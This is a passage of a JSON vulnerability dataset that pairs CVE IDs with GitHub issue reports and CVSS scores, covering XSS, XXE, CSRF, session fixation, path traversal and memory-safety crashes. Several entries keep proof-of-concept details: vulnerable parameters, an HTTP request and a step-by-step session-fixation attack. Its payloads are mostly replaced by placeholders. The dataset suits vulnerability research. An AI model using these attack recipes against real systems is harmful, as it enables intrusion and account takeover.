        "description": "memory allocation error. there is a extra large memery allocation error which can be detected by addresssanitizer NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG bytes of APITAG Cannot allocate memory NUMBERTAG b NUMBERTAG a NUMBERTAG b2 ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG dc ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d2ed ( PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a1c4 in main PATHTAG NUMBERTAG b5fe3a NUMBERTAG PATHTAG NUMBERTAG ad NUMBERTAG in _start ( PATHTAG ) the source code around here are: APITAG = (uint NUMBERTAG t )malloc(sizeof(uint NUMBERTAG t) num_objects); the num_objects equals to a very large number. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-6490",
        "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/167",
        "Issue_Url_new": "https://github.com/telaxus/epesi/issues/167",
        "Repo_new": "Telaxus/EPESI",
        "Issue_Created_At": "2017-03-02T18:19:01Z",
        "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : cid, value, element, mode, tab, form_name, id Value : > APITAG alert NUMBERTAG APITAG APITAG Want to back this issue? Post a bounty on it! URLTAG We accept bounties via Bountysource URLTAG . APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8288",
        "Issue_Url_old": "https://github.com/EasyScreenCast/EasyScreenCast/issues/46",
        "Issue_Url_new": "https://github.com/easyscreencast/easyscreencast/issues/46",
        "Repo_new": "easyscreencast/easyscreencast",
        "Issue_Created_At": "2015-10-12T12:03:44Z",
        "description": "Locking Screen sometimes dock and window list will remain in view. Sometimes when I lock the screen, the dock and window list will be in view. I am running Gnome NUMBERTAG on EL NUMBERTAG Beta with APITAG NUMBERTAG gnome shell NUMBERTAG Gjs WARNING : JS ERROR: Exception in callback for signal: updated: Error: Type name APITAG is already registered PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-9614",
        "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/167",
        "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/167",
        "Repo_new": "libjpeg-turbo/libjpeg-turbo",
        "Issue_Created_At": "2017-08-12T15:53:56Z",
        "description": "CVETAG . The follow was crash reported on the full disclosure mailing list (It also includes a APITAG and was assigned CVETAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000215",
        "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/267",
        "Issue_Url_new": "https://github.com/davegamble/cjson/issues/267",
        "Repo_new": "davegamble/cjson",
        "Issue_Created_At": "2018-05-21T09:21:27Z",
        "description": "Memory leak here I think. cJSON.C Line NUMBERTAG If hooks >reallocate failed and set 'buffer >buffer' to NULL without free.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000519",
        "Issue_Url_old": "https://github.com/aio-libs/aiohttp-session/issues/272",
        "Issue_Url_new": "https://github.com/aio-libs/aiohttp-session/issues/272",
        "Repo_new": "aio-libs/aiohttp-session",
        "Issue_Created_At": "2018-04-30T08:22:10Z",
        "description": "Session Fixation vulnerability in APITAG There is a window of opportunity for Session Fixation URLTAG exploitation in the logic of APITAG As seen here: URLTAG Get session data returns an empty dictionary for an empty (this includes invalidated) session. Referring here: URLTAG save_session takes this data and saves it in Redis. As a result, an invalidated session will result to the session ID being present in Redis with an empty mapping as its value. Now looking over at: URLTAG APITAG load_session only looks at the case where data (returned by reading from Redis) is None. This will happen only if the key (session ID) is not present in Redis (has either expired or was never inserted) but as we established above the key is never actually removed, just the value mapping emptied. As a result the load_session function will return a session with the presented session ID and not a new one, although there was no valid session in storage for this ID. If this is not caught and mitigated by the web app the following scenario can unfold: Attacker acquires a valid cookie Invalidates it (logs out) Attacker injects said cookie in victim's browser (see OWASP's link above for examples on how) Victim visits web app presenting the cookie present in his browser Web app uses the get_session to get a session object for the user, expecting a 'clean' session get_session returns a session with the session ID that was present in the cookie presented by the user session is populated by the web app and subsequently stored by aiohttp session during the response User is now logged in with the session ID of the cookie that was injected by the attacker The attacker now controls (knows) a session cookie for a given user",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000521",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/328",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/328",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2018-02-23T16:59:59Z",
        "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG The low privileged(administrator) users can use this vulnerability to attack high APITAG users. For example\uff0cthere are two users: ]( URLTAG The low privileged(administrator) users can add user and set the email value to \u201c APITAG \u201d ![ URLTAG CODETAG When the high APITAG user view users\uff0che will be xssed: ]( URLTAG ![ URLTAG Thank you! email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000548",
        "Issue_Url_old": "https://github.com/umlet/umlet/issues/500",
        "Issue_Url_new": "https://github.com/umlet/umlet/issues/500",
        "Repo_new": "umlet/umlet",
        "Issue_Created_At": "2018-04-04T11:17:05Z",
        "description": "XXE Security Vulnerability within Umlet Open File Function. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The line of code given below create an XML parser for parsing an XML file (or a uxf file) opened and parses the data within: URLTAG This parsing is done in an insecure manner and does not prohibit the usage of XML external entities. This allows attackers to do the above mentioned attacks on a targeted user. Attack Scenario An attacker could be sharing a diagram made within the Umlet software and exported as a uxf file. An example could be sharing a class diagram with a peer and exploiting that trusted relationship to perform unauthorised actions within their system (or even just downloading a class diagram online). APITAG File File named test.uxf APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-1000632",
        "Issue_Url_old": "https://github.com/dom4j/dom4j/issues/48",
        "Issue_Url_new": "https://github.com/dom4j/dom4j/issues/48",
        "Repo_new": "dom4j/dom4j",
        "Issue_Created_At": "2018-07-01T09:25:35Z",
        "description": "Validate APITAG inputs. APITAG doesn't validate inputs, so it is possible to create APITAG for example with '<' in the tag name. The bug was reported by MENTIONTAG thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000651",
        "Issue_Url_old": "https://github.com/gchq/stroom/issues/813",
        "Issue_Url_new": "https://github.com/gchq/stroom/issues/813",
        "Repo_new": "gchq/stroom",
        "Issue_Created_At": "2018-07-23T12:28:20Z",
        "description": "XXE in XML Parser. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippet displays the usage of APITAG without disabling entities: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000820",
        "Issue_Url_old": "https://github.com/neo4j-contrib/neo4j-apoc-procedures/issues/931",
        "Issue_Url_new": "https://github.com/neo4j-contrib/neo4j-apoc-procedures/issues/931",
        "Repo_new": "neo4j-contrib/neo4j-apoc-procedures",
        "Issue_Created_At": "2018-09-29T09:24:23Z",
        "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000872",
        "Issue_Url_old": "https://github.com/OpenKMIP/PyKMIP/issues/430",
        "Issue_Url_new": "https://github.com/openkmip/pykmip/issues/430",
        "Repo_new": "openkmip/pykmip",
        "Issue_Created_At": "2018-04-24T13:22:29Z",
        "description": "No socket timeout may lead to denial of service. The server socket does not have a socket timeout defined. It is possible for a rogue connection to cause the server to be permanently stuck in the SSL handshake. To repro: Start server APITAG to establish a connection without completing the SSL handshake All future connections will be blocked Adding a defaulttimeout seems to fix this. CODETAG Log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1002100",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/61297",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/61297",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2018-03-16T19:24:46Z",
        "description": "Kubectl copy doesn't check for paths outside of it's destination directory.. Is this a BUG REPORT or FEATURE REQUEST? : Bug /kind bug What happened : kubectl cp PATHTAG PATHTAG If the container returns a malformed tarfile with paths like: PATHTAG kubectl writes this to APITAG instead of APITAG What you expected to happen : I expect kubectl to clean up the path and write to APITAG Notes Original credit to MENTIONTAG APITAG Hanselmann) for originally reporting the bug.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-10186",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/9915",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9915",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-04-17T15:20:06Z",
        "description": "heap buffer overflow in r_hex_bin2str ( PATHTAG ). This issue looks different from issue NUMBERTAG which is a stack based overflow and has been patched. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | dex | Architecture/bits of the file (mandatory) | ARM, Dalvik dex file version NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Successful processing of dex format Actual behavior heap buffer overflow Steps to reproduce the behavior download the attached POC checkout commit APITAG build with ASAN: ASAN='address' FILETAG run: radare2 A $POC Vulnerable code // PATHTAG NUMBERTAG R_API int r_hex_bin2str(const ut8 in, int len, char out NUMBERTAG int i, id NUMBERTAG char tmp FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-10550",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4454",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4454",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2018-04-06T03:18:59Z",
        "description": "User from tenant scoped team can see machines that do not scope to the tenant. Ticket: URLTAG Why Currently there is no restriction on machines that based on the scoped tenants, the restriction only apply on scoped environments What can we do? Apply the restrictions to machines based on scoped tenant. Check the filter logic in this class APITAG The complication Deployment target tenant setting can be ERRORTAG , ERRORTAG and Tenanted Tenant scoped users should not be able to see untenanted machines Tenant scoped users should not be able to see machine that does not scoped to the tenant Untenanted users should not be able to see tenanted only machines Should be more to add, let's have this one to start with Maybe it is not that bad Did a test that user scoped to NUMBERTAG tenant APITAG Project connected to tenants APITAG , APITAG and APITAG Deployment can only be made to APITAG Thought that user can see all other machines that from other tenants, as the user can only deployed to the scoped tenant, it is not that bad, it is more like a UI bug",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11226",
        "Issue_Url_old": "https://github.com/libming/libming/issues/144",
        "Issue_Url_new": "https://github.com/libming/libming/issues/144",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-05-16T21:22:41Z",
        "description": "buffer overflow in APITAG in APITAG URLTAG URLTAG Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG a in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG ea in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG c in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"buffer overflow detected\") at APITAG NUMBERTAG ffff NUMBERTAG in __GI___chk_fail () at APITAG NUMBERTAG ffff NUMBERTAG c9 in _IO_str_chk_overflow (fp=<optimized out>, c=<optimized out>) at APITAG NUMBERTAG ffff NUMBERTAG b0 in __GI__IO_default_xsputn (f NUMBERTAG fffffffddb0, data=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in _IO_vfprintf_internal (s=s APITAG format=<optimized out>, format APITAG \"%ld\", ap=ap APITAG at APITAG NUMBERTAG ffff NUMBERTAG in ___vsprintf_chk (s NUMBERTAG b NUMBERTAG flags NUMBERTAG slen NUMBERTAG format NUMBERTAG af \"%ld\", APITAG at APITAG NUMBERTAG ffff NUMBERTAG ad in ___sprintf_chk (s=s APITAG NUMBERTAG flags=flags APITAG slen=slen APITAG format=format APITAG \"%ld\") at APITAG NUMBERTAG e NUMBERTAG in sprintf (__fmt NUMBERTAG af \"%ld\", __s NUMBERTAG b NUMBERTAG at PATHTAG NUMBERTAG APITAG (act=act APITAG at APITAG NUMBERTAG bb in APITAG (act=act APITAG at APITAG NUMBERTAG e9e9 in APITAG APITAG maxn NUMBERTAG actions NUMBERTAG a6e NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG bc9b in APITAG (n NUMBERTAG actions NUMBERTAG a6e NUMBERTAG maxn NUMBERTAG at APITAG NUMBERTAG d6d in APITAG (indent=<optimized out>, actions=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG decompile_SWITCH (n NUMBERTAG off1end=<optimized out>, maxn=<optimized out>, actions NUMBERTAG a6ce0) at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG c NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d6d in APITAG (indent=<optimized out>, actions=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG decompile_SWITCH (n NUMBERTAG off1end=<optimized out>, maxn=<optimized out>, actions NUMBERTAG c5f0) at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG e0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Breakpoint NUMBERTAG APITAG (act=act APITAG at APITAG NUMBERTAG t=malloc NUMBERTAG bit decimal / (gdb) l NUMBERTAG t = malloc(needed_length NUMBERTAG sprintf(t, \"%g\", act APITAG NUMBERTAG return t NUMBERTAG case PUSH_INT: / INTEGER NUMBERTAG t=malloc NUMBERTAG bit decimal NUMBERTAG sprintf(t,\"%ld\", act APITAG NUMBERTAG return t NUMBERTAG case PUSH_CONSTANT: / CONSTANT NUMBERTAG if (act APITAG > poolcounter) (gdb) n NUMBERTAG sprintf(t,\"%ld\", act APITAG ); (gdb) n NUMBERTAG t=malloc NUMBERTAG bit decimal / (gdb) n NUMBERTAG sprintf(t,\"%ld\", act APITAG ); (gdb) n buffer overflow detected : PATHTAG terminated",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11227",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/438",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/438",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-05-17T00:21:08Z",
        "description": "Monstra XSS Vulnerability MENTIONTAG Hello team :) I found xss at index page I reported to the cve platform, they let me use CVETAG , you can contact them for details Request GET PATHTAG NUMBERTAG a NUMBERTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: tr TR,tr; APITAG US; APITAG Accept Encoding: gzip, deflate DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Response APITAG APITAG APITAG new APITAG APITAG })( PATHTAG ); _mga('create', '', 'auto'); _mga('send', 'pageview', { 'page': ' URLTAG 'title': '' }); APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG alert NUMBERTAG APITAG jiznp\" /> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG <img id='cryptogram'",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11307",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2032",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2032",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2018-05-10T04:23:03Z",
        "description": "Security issue with default typing, another reported potential gadget type. (note: this is a placeholder and more details will be added after fix added, and ideally CVE allocated) A new potential gadget type has been reported, possibly affecting databind up to and including APITAG , APITAG , APITAG (as well as earlier minor versions). Type is from APITAG library.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11405",
        "Issue_Url_old": "https://github.com/Kliqqi-CMS/Kliqqi-CMS/issues/256",
        "Issue_Url_new": "https://github.com/kliqqi-cms/kliqqi-cms/issues/256",
        "Repo_new": "kliqqi-cms/kliqqi-cms",
        "Issue_Created_At": "2018-05-23T14:59:19Z",
        "description": "There is a CSRF which can create an account with admin's privileges.. After admin logging in,click the following link,eviladmin will be created with admin's privileges. APITAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11489",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/37",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/37",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2018-05-24T02:23:49Z",
        "description": "Heap Buffer Overflow NUMBERTAG in function APITAG in cgif.c. Here is the bug NUMBERTAG else NUMBERTAG Its a code to needed to be traced: trace the linked list NUMBERTAG until the prefix is a pixel, while pushing the suffi NUMBERTAG pixels on our stack. If we done, pop the stack in reverse NUMBERTAG thats what stack is good for!) order to output NUMBERTAG if APITAG == NO_SUCH_CODE) { in line NUMBERTAG APITAG should be checked cause Prefix is a array which has LZ_MAX_CODE NUMBERTAG size: unsigned int Prefix[LZ_MAX_CODE NUMBERTAG The crash appears as follows: (gdb) run crash NUMBERTAG FILETAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG if APITAG == NO_SUCH_CODE) { (gdb) bt NUMBERTAG in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG eb in APITAG APITAG Line=<optimized out>, APITAG out>) at APITAG NUMBERTAG ba in APITAG APITAG at APITAG NUMBERTAG d in in_gif_reader (ufd=<optimized out>) at APITAG NUMBERTAG fca8 in Image::load (ufd NUMBERTAG a NUMBERTAG APITAG format=format APITAG at APITAG NUMBERTAG eb0 in run_sam2p_engine (sout=..., serr=..., arg NUMBERTAG optimized out>, helpp=helpp APITAG at APITAG NUMBERTAG d0 in main (arg NUMBERTAG fffffffe5c8) at APITAG (gdb) p APITAG NUMBERTAG gdb)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11499",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2643",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2643",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-05-02T00:22:46Z",
        "description": "APITAG heap use after free in libsass. Hey there, I have discovered a use after free vulnerability in libsass. Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. After testing all releases, it is evident this was introduced in release NUMBERTAG of libsass. Compile flags to reproduce: APITAG You can find the case file FILETAG . ASAN report is as follows: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11512",
        "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/150",
        "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/150",
        "Repo_new": "creatiwity/witycms",
        "Issue_Created_At": "2018-05-27T05:25:29Z",
        "description": "Persistent XSS on APITAG name' field (site_title). Hi guys, wonderful work on the CMS! I found a security issue on the website's name in the admin settings: Stored cross site scripting (XSS) vulnerability in the APITAG name\" field found in the APITAG page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG name\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: APITAG Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG The payload gets saved in the file: PATHTAG as a raw Javascript code: FILETAG When an unauthenticated user visits the page, the code gets executed: FILETAG If the data is not sanitized upon input, these components are going to return arbitrary web script or HTML that can be rendered by the browser because it retrieves the script, hence, the possible APITAG Components\" are as follow: Potentially all scripts using: PATHTAG Potentially all scripts using: PATHTAG PATHTAG PATHTAG PATHTAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-11531",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/283",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/283",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-04-22T13:18:05Z",
        "description": "heap buffer overflow in APITAG ERRORTAG Reproducer: FILETAG SHA1: APITAG Tools: afl NUMBERTAG b, afl utils",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11558",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/66",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/66",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-05-29T14:29:58Z",
        "description": "There are two Stored XSS vulnerability. There are two Stored XSS vulnerability. read only user use the add the Stored XSS and CSRF can add administrator account or change the read only user to admin or change admin password\u2026\u2026 poc: after read only user login post url APITAG post data: APITAG then the admin login ,open the url URLTAG the javascript will execution. with CSRF vulnerability( URLTAG , a read only user can add administrator account or change the read only user to admin or change admin password\u2026\u2026",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-11624",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1149",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1149",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-05-29T08:23:54Z",
        "description": "heap use after free. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Version: APITAG NUMBERTAG Q NUMBERTAG Steps to Reproduce ERRORTAG POC FILETAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Found by: Wang Zongming",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11626",
        "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/12",
        "Issue_Url_new": "https://github.com/saharatul/sela/issues/12",
        "Repo_new": "saharatul/sela",
        "Issue_Created_At": "2018-05-29T09:24:38Z",
